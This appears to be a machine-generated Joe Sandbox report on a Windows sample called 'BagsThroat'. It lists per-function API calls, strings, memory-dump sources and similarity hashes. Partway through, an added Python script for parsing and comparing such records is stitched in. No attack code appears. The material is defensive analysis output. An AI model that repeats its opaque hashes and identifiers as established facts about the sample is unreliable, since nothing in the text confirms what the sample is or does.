                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWritelstrcpyn
                                        • String ID: 176$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                        • API String ID: 247603264-2230508642
                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                        Control-flow Graph (graph image not reproduced)
                                        • Function 004021B5, basic blocks 4021b5-402223 (exits via 4030f2). Blocks with API calls: 4021b5 ShellExecuteW. Internal calls: 40145c * 4, 404f9e, 4062cf.
                                        APIs
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                        • API String ID: 3156913733-2180253247
                                        • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                        • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                        • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                        • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                        Control-flow Graph (graph image not reproduced)
                                        • Function 00405EAB, basic blocks 405eab-405efd. Block 405eb8 calls GetTickCount and GetTempFileNameW; the edge 405eee -> 405eb8 loops back to retry the call. No internal calls.
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: nsa
                                        • API String ID: 1716503409-2209301699
                                        • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                        • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                        • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                        • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                        Control-flow Graph

                                        Nodes (basic-block address ranges, with the calls made in each block) and edges recovered from the control-flow graph:
                                        • 842: 402175-40218b, call 401446 (twice) -> 847, 848
                                        • 847: 402198-40219d -> 849, 850
                                        • 848: 40218d-402197, call 4062cf -> 847
                                        • 849: 4021aa-4021b0, EnableWindow -> 852
                                        • 850: 40219f-4021a5, ShowWindow -> 852
                                        • 852: 4030e3-4030f2
                                        APIs
                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                        • String ID: HideWindow
                                        • API String ID: 1249568736-780306582
                                        • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                        • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                        • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                        • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
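The per-function records above (API calls with their call-site refs, the Similarity keys, the Opcode ID and the fuzzy hashes) are what an analyst compares across reports to find the same function in another sample. The following Python is an added example and is not Joe Sandbox code: it parses two records copied from this page into structured objects, then compares records by the set of APIs the function calls directly and by an identical Opcode ID. Only the record layout visible on the page is taken from the report; the class, field and function names are my own, and treating Opcode ID as a per-function hash is an assumption, since the report does not define the field.

```python
"""Parse the per-function records of this report into structured data and
compare functions across records.

Added example, not Joe Sandbox code: only the record layout visible on this
page (the "APIs" bullets ending in ", ref: ADDR" and the "Similarity" bullets)
is taken from the report; class, field and function names are my own.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: two records copied from this page, trimmed to the
# sections the parser reads.
SAMPLE = """\
APIs
• GetTickCount.KERNEL32 ref: 00405EC9
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
Strings
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
• Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
APIs
• ShowWindow.USER32(00000000,00000000), ref: 0040219F
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• EnableWindow.USER32(00000000,00000000), ref: 004021AA
Similarity
• API ID: Window$EnableShowlstrlenwvsprintf
• String ID: HideWindow
• API String ID: 1249568736-780306582
• Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
• Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by the report's
# "Part of subcall function ADDR:" marker for APIs reached through a callee.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s+ref:\s+([0-9A-Fa-f]+)\s*$"
)
# "• Key: value" bullets under the Similarity heading.
SIM_RE = re.compile(r"^\s*•\s*([A-Za-z ]+?):\s*(.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                       # call-site address
    subcall: Optional[str] = None  # callee address when marked "Part of subcall"


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)


def parse_records(text: str) -> list[FunctionRecord]:
    """Split flattened report text into records; a record starts at each 'APIs' line."""
    records: list[FunctionRecord] = []
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped == "APIs":
            records.append(FunctionRecord())
            section = "apis"
        elif stripped == "Similarity":
            section = "sim"
        elif not stripped.startswith("•"):
            section = None  # any other heading (Strings, Memory Dump Source, ...)
        elif records and section == "apis":
            m = API_RE.match(line)
            if m:
                sub, name, module, args, ref = m.groups()
                # Naive split: the string arguments in these records contain no commas.
                arglist = args.split(",") if args else []
                records[-1].calls.append(ApiCall(name, module, arglist, ref, sub))
        elif records and section == "sim":
            m = SIM_RE.match(line)
            if m:
                records[-1].similarity[m.group(1)] = m.group(2)
    return records


def direct_api_names(rec: FunctionRecord) -> list[str]:
    """Call sequence of the function itself, excluding APIs reached via subcalls."""
    return [c.name for c in rec.calls if c.subcall is None]


def api_set(rec: FunctionRecord) -> set[str]:
    return set(direct_api_names(rec))


def jaccard(a: set[str], b: set[str]) -> float:
    """Overlap of two API sets; two empty sets count as identical."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def has_sequence(rec: FunctionRecord, seq: list[str]) -> bool:
    """True if seq occurs in order (not necessarily adjacent) in the direct call sequence."""
    it = iter(direct_api_names(rec))
    return all(any(name == want for name in it) for want in seq)


def same_function(a: FunctionRecord, b: FunctionRecord) -> bool:
    """Exact match on the report's Opcode ID (assumed here to be a per-function hash)."""
    oid = a.similarity.get("Opcode ID")
    return bool(oid) and oid == b.similarity.get("Opcode ID")


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.similarity.get("API ID"), direct_api_names(r))
    print("jaccard:", jaccard(api_set(recs[0]), api_set(recs[1])))
```

To use it on a whole report, feed the saved page text instead of SAMPLE; records from a second sample can then be matched with same_function for an exact hit, or ranked by jaccard when only part of the API set is shared. Subcall APIs are kept on the record but excluded from the comparison on purpose, because they belong to the callee and would make unrelated callers look alike.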
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                        • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                        • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                        • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                        • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                        • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                        • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                        • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                        • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                        • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                        • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                        • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                        • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                        APIs
                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Char$Next$CreateDirectoryPrev
                                        • String ID:
                                        • API String ID: 4115351271-0
                                        • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                        • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                        • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                        • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                        APIs
                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                        • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                        • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                        • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                        • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                        • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                        • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                        APIs
                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
